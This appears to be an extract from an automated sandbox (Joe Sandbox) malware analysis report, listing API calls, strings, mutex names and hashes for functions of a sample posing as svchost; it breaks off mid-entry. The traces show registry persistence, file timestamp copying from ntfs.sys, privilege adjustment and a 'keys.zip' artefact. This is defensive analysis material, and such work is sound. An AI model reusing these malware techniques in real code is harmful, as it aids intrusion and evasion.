                                                                                                                                                                                                              • memset.MSVCRT ref: 0264F41B
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?,00000000,00000000,?), ref: 0264F426
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(?,00000000,00000000,?,?,026856DC,?,02685E1C,-04D1F5C8,00000000,00000000,?), ref: 0264F4EE
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 0264F4F5
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(?,00000000), ref: 0264F501
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0264F508
                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,02685E1C,-04D1F5C8,00000000,00000000,?), ref: 0264F52E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,-04D1F5C8,00000000,00000000,?,?,?,?), ref: 0264F55A
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 0264F55D
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0264F56A
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0264F56D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidatememcpy$Allocmemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1948005343-0
                                                                                                                                                                                                              • Opcode ID: d9e2bb3f9b673cc550735530ca073075064fd01716f1b3fd2ed1c7c7a37eb12c
                                                                                                                                                                                                              • Instruction ID: b30d9ed98c0c2be2d937e1631b6af6a16144c8e15baaee93af8f3ae2eac870a0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d9e2bb3f9b673cc550735530ca073075064fd01716f1b3fd2ed1c7c7a37eb12c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B161C272A00209ABDB24DF68DC84AAEBBA9FF94324F058259FD4597340DF71D951CBE0
                                                                                                                                                                                                              Function 02647B00 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 124registrymemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02647B33
                                                                                                                                                                                                              • memset.MSVCRT ref: 02647B4B
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000101,?,?,?,?,?,?,76F8F380), ref: 02647B6C
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,00000104,00000000,00000001,?,00000104,?,?,?,?,?,76F8F380), ref: 02647B92
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,76F8F380), ref: 02647C1D
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,76F8F380), ref: 02647C24
                                                                                                                                                                                                              • memset.MSVCRT ref: 02647C33
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,76F8F380), ref: 02647C63
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                              • String ID: software\microsoft
                                                                                                                                                                                                              • API String ID: 4158279268-3673152959
                                                                                                                                                                                                              • Opcode ID: 99d93d072a64a9f1d4ce1101e2d947022a6da43fdb68131c9b88f620db5e3b04
                                                                                                                                                                                                              • Instruction ID: 770e5c75e79287dd3d5f51af77395539f4312981570b7b5ff3fa64b64eb53244
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 99d93d072a64a9f1d4ce1101e2d947022a6da43fdb68131c9b88f620db5e3b04
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4541F77190015DAFEB15DF748C98AEEB7BDEB58304F4046ACE585D3240EB705F858BA0
                                                                                                                                                                                                              Function 026548F0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 103registrystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02654902
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0265491A
                                                                                                                                                                                                              • memset.MSVCRT ref: 02654941
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,-0000000B,00000104), ref: 0265496F
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(-091561A1,software\microsoft,00000000,00000102,00000000), ref: 026549CE
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(00000000,00000000,00000000,00000001,00000000,00000001), ref: 026549FE
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(00000000), ref: 02654A0C
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 02654A1A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AdminCloseFlushOpenUserValuelstrcpynmemsetstrstr
                                                                                                                                                                                                              • String ID: software\microsoft
                                                                                                                                                                                                              • API String ID: 1783443066-3673152959
                                                                                                                                                                                                              • Opcode ID: 61bec75bfab725c0dd79241ba5620d0e4c947bc1fec8ef1993b7eaa71ef1eaa8
                                                                                                                                                                                                              • Instruction ID: a76c79e291756a3a4fcb781705d6b62df39179bcf12269054a9816bf04f6e5a9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 61bec75bfab725c0dd79241ba5620d0e4c947bc1fec8ef1993b7eaa71ef1eaa8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1931F631A44219ABDB26CF24DC49FEE7BB8AB45705F1446D4ED46AB240EBB09684CB90
                                                                                                                                                                                                              Function 004014B0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 93processstringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 004014C8
                                                                                                                                                                                                              • memset.MSVCRT ref: 004014EE
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,00402CFF,00000104,?,?,?,00000000,00000000,00000000), ref: 00401506
                                                                                                                                                                                                              • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 00401529
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,00402CFF,?,?,?,00000000,00000000,00000000), ref: 0040154A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 00401557
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,00402CFF,?,?,?,00000000,00000000,00000000), ref: 0040156E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0040157B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$CloseInformationmemset$CreateProcesslstrcpyn
                                                                                                                                                                                                              • String ID: D
                                                                                                                                                                                                              • API String ID: 2248944234-2746444292
                                                                                                                                                                                                              • Opcode ID: ce458dfe1c04613ef12f54a39762905d76d3e86305e9e66b4aeea111f9933b52
                                                                                                                                                                                                              • Instruction ID: 14e7369bd1a15e27c4b274561f890c179ee839510f861d06d6d7e351d84cbd4c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce458dfe1c04613ef12f54a39762905d76d3e86305e9e66b4aeea111f9933b52
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF2167B290020C6FDB10DFE8DD84ADF7BBCAB94355F00457AFA05FA240D6349A458BA4
                                                                                                                                                                                                              Function 02662800 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A277), ref: 02662827
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000,?,?), ref: 02662867
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?), ref: 02662871
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02662879
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 0266288A
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?), ref: 02662891
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?,?,?), ref: 0266289E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DirectoryErrorLastPath$AdminBackslashCreateCurrentFolderMakeSystemUser
                                                                                                                                                                                                              • String ID: 8A99A277$keys.zip
                                                                                                                                                                                                              • API String ID: 4256651433-3737454241
                                                                                                                                                                                                              • Opcode ID: 49749447260084eb8988bbb495c2f40b87da6f1ad9e24c40277241658ddead63
                                                                                                                                                                                                              • Instruction ID: 8046a9a38479fb1c07b446d94d9ae4e2ff7594961599f63c9f1a6d4da7dd1c38
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 49749447260084eb8988bbb495c2f40b87da6f1ad9e24c40277241658ddead63
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC21D6709003595BDB158B389C6CAFF7BE8AF55301F548698ED86C7300EB70C998CB90
                                                                                                                                                                                                              Function 00401BE0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76filetimeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(\\?\globalroot\systemroot\system32\drivers\ntfs.sys,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C05
                                                                                                                                                                                                              • GetFileTime.KERNEL32(00000000,?,?,00402CA7,?,?,?,?,?,00402CA7,?,?,?), ref: 00401C1F
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C35
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402CA7,?), ref: 00401C46
                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C62
                                                                                                                                                                                                              • SetFileTime.KERNEL32(00000000,?,?,00402CA7,?,?,?,?,?,00402CA7,?), ref: 00401C78
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C8E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402CA7,?), ref: 00401C9F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • \\?\globalroot\systemroot\system32\drivers\ntfs.sys, xrefs: 00401C00
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileHandle$CloseCreateInformationTime
                                                                                                                                                                                                              • String ID: \\?\globalroot\systemroot\system32\drivers\ntfs.sys
                                                                                                                                                                                                              • API String ID: 1046229350-2760794270
                                                                                                                                                                                                              • Opcode ID: 7c78bbbd609582fa450ae599ee540afb2fc557391311a346b79caf6ae330784a
                                                                                                                                                                                                              • Instruction ID: 0895f171d82555aaaa5436e0262d4f4d844cfaf0768df501368bcb823c663742
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c78bbbd609582fa450ae599ee540afb2fc557391311a346b79caf6ae330784a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE21F9729452187BF7219B50DD09FEF7B6CAF44710F148226FF01B61D0D778964586AC
                                                                                                                                                                                                              Function 004028D0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 34COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GlobalFindAtomA.KERNEL32(Wed Jul 6 06:49:26 20112,?,?,00402E9C), ref: 004028D9
                                                                                                                                                                                                              • GlobalAddAtomA.KERNEL32(Wed Jul 6 06:49:26 20112), ref: 004028EA
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 004028F6
                                                                                                                                                                                                              • RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?), ref: 00402906
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0040290C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AdminAtomGlobalUser$AdjustFindPrivilege
                                                                                                                                                                                                              • String ID: PnSw$Wed Jul 6 06:49:26 20112$explorer.exe$winlogon.exe
                                                                                                                                                                                                              • API String ID: 3001685711-2911081799
                                                                                                                                                                                                              • Opcode ID: 83ac0b8a74455aed3f9fe13c08d3b3a7fcb0d139d0bb709980968f6615d0e93a
                                                                                                                                                                                                              • Instruction ID: 2c3c2cb6c74497f887580688acf30243e480456bbc90e7420e586ff1c8abd763
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 83ac0b8a74455aed3f9fe13c08d3b3a7fcb0d139d0bb709980968f6615d0e93a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3FF012B07542196AEA1067A1AE0AB5B3A5CDB84790F404177BF04F61D0DAB99C0185FD
                                                                                                                                                                                                              Function 026632C8 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 30sleepsynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}), ref: 026632DC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 026632E5
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 026632F9
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0266330B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A277), ref: 02663316
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,8A99A277,RFK), ref: 02663330
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 02663336
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                              • String ID: 8A99A277$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$RFK
                                                                                                                                                                                                              • API String ID: 4280258085-1512082180
                                                                                                                                                                                                              • Opcode ID: dca82a606211227b5bd707e6a402190f0aaecb0b678ffd630aafba2fac2ca3fd
                                                                                                                                                                                                              • Instruction ID: 300f6559f900d6d9c2de45931cf7eb13ff35293f23f31e0770b71a71caa89d6d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dca82a606211227b5bd707e6a402190f0aaecb0b678ffd630aafba2fac2ca3fd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7F0E270AC53407AF32067A08C0AB6E7B986F48F04F844505FA07A1240DFA084618AA2
                                                                                                                                                                                                              Function 0265B908 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 30sleepsynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}), ref: 0265B91C
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 0265B925
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 0265B939
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0265B94B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8a99a6dd), ref: 0265B956
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,8a99a6dd,ALPHA), ref: 0265B970
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 0265B976
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                              • String ID: 8a99a6dd$ALPHA$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
                                                                                                                                                                                                              • API String ID: 4280258085-1784723349
                                                                                                                                                                                                              • Opcode ID: 8e8e0e8297d7e01a717814e4e204714566c51a4b5380abc91fa2fadaae2b0e4b
                                                                                                                                                                                                              • Instruction ID: 6a009dcbddeecf688cc01d2af33dc4e583aed3d4fa884db1cf4f2ad65971a41a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e8e0e8297d7e01a717814e4e204714566c51a4b5380abc91fa2fadaae2b0e4b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6EF0A7306CA3217BFB216B608C1AB5E77E8AF0AB0DF454504FD47A1384DBF090118BAB
                                                                                                                                                                                                              Function 0264FBF0 Relevance: 15.3, APIs: 7, Strings: 3, Instructions: 271COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000000), ref: 0264FCCA
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?,?,?,?,00001100,?,?,?,?,?,?,?,?,?), ref: 0264FD7A
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 0264FD96
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,?), ref: 0264FDA5
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,Content-Length,?), ref: 0264FDFC
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 0264FE1D
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,?), ref: 0264FE9F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memcpy$_snprintf
                                                                                                                                                                                                              • String ID: 0$%x$Content-Length
                                                                                                                                                                                                              • API String ID: 4125937431-3838797520
                                                                                                                                                                                                              • Opcode ID: bfd029986c69a3ac299e2db55750440c8e38836f841f193ebe68f80e4a67f7e3
                                                                                                                                                                                                              • Instruction ID: 516b05f7bb9f5aef524eb91e561a1e2ff1f6060d8087b82664bb53dabb82e954
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bfd029986c69a3ac299e2db55750440c8e38836f841f193ebe68f80e4a67f7e3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D2918372A00706AFC714DF68D88096BB7A9FF88324B044B1DF95987B41DB30E954CBE5
                                                                                                                                                                                                              Function 0264B820 Relevance: 15.1, APIs: 10, Instructions: 81synchronizationwindowthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0264B843
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 0264B870
                                                                                                                                                                                                              • IsWindow.USER32(?), ref: 0264B877
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000215,00000000,00000000), ref: 0264B889
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0264B898
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0264B8A2
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0264B8B4
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 0264B8E1
                                                                                                                                                                                                              • IsWindow.USER32(?), ref: 0264B8E8
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000215,00000000,?), ref: 0264B8FB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$MessageMutexObjectReleaseSendSingleThreadWait$CurrentProcess
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2596333622-0
                                                                                                                                                                                                              • Opcode ID: 340c5ddc7821d72e78436f79621a2cf91f0ba00bbbe360022c61047c4def795b
                                                                                                                                                                                                              • Instruction ID: 802fefb99034fbb3939d78162a517d7ae83548d6c7a775098319df40388f8d52
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 340c5ddc7821d72e78436f79621a2cf91f0ba00bbbe360022c61047c4def795b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F21D371A81110BFC3108F65EC4CEAEBBE8EB49731B455A76F506D7290CBB184A1CBA0
                                                                                                                                                                                                              Function 02664278 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 121synchronizationsleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0269D19C), ref: 02664297
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0269D19C,?,?), ref: 02664329
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214},?,?), ref: 026643B5
                                                                                                                                                                                                                • Part of subcall function 026659D0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 026659EE
                                                                                                                                                                                                                • Part of subcall function 026659D0: GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,02645DE8,?,?,02645DE8,?,00000001), ref: 02665A0B
                                                                                                                                                                                                                • Part of subcall function 026659D0: SetNamedSecurityInfoA.ADVAPI32(?,02645DE8,00000010,00000000,00000000,00000000,00000001), ref: 02665A26
                                                                                                                                                                                                                • Part of subcall function 026659D0: LocalFree.KERNEL32(?,?,?,02645DE8,?,00000001), ref: 02665A37
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214},00000006), ref: 026643D2
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 026643D9
                                                                                                                                                                                                                • Part of subcall function 02647310: GetHandleInformation.KERNEL32(?,00000000), ref: 02647324
                                                                                                                                                                                                                • Part of subcall function 02647310: CloseHandle.KERNEL32(?), ref: 02647335
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Security$Descriptor$BackslashHandleMutexPath$CloseConvertCreateFreeInfoInformationLocalNamedReleaseSaclSleepString
                                                                                                                                                                                                              • String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$keys.zip$path.txt
                                                                                                                                                                                                              • API String ID: 2697826820-558722157
                                                                                                                                                                                                              • Opcode ID: 5c19a7a1ed6b0e709b9ecd2ac995cf761d4bee0658123ed2d5fbfff6376de192
                                                                                                                                                                                                              • Instruction ID: 25f7ccc4fdebc426800f99f01018c583fba724cb15af403d49b56b70c499c521
